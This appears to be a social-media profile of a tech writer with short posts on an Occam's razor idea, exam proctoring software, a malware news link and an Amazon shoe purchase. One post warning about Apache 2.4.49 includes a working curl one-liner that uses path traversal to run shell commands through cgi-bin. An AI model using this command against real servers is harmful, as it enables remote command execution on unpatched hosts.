Jonathan Bennett @jp_bennett@twit.social
Co-host of FLOSS Weekly, writer at Hackaday.com, and a small business owner in Oklahoma
Apache 2.4.49 has a huge security problem: curl --data "A=|echo;id" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
I suggest a rework of Occam's razor: rather than the simplest answer being correct, the simplest answer is likely a good enough model to work from.
It means that anytime you think a problem or system is simple, you're interacting with an abstraction or model of reality. There is limitless complexity to be had, but sometimes the simple model is good enough
Simplicity is an illusion.
Today I wondered if security cert exams have finally become worth taking seriously in the last decade.
They all require Win/Mac machines to run their proctoring malware on, even for Linux Security exams.
I'll look again in another decade.
New Malware Hidden in Apple IDE Targets macOS Developers. https://www.darkreading.com/application-security/new-malware-hidden-in-apple-ide-targets-macos-developers/d/d-id/1340471
As convenient as Amazon is, there is a dark side. I need a new pair of brown dress shoes, and found some Allen Edmonds that I really liked. Full price, but true A&Es are worth it, and these were sold by Amazon, not a third party seller. Start reading the reviews, and guess what. They are selling factory seconds at full price.
Co-host of FLOSS Weekly, writer at Hackaday.com, and a small business owner in Oklahoma
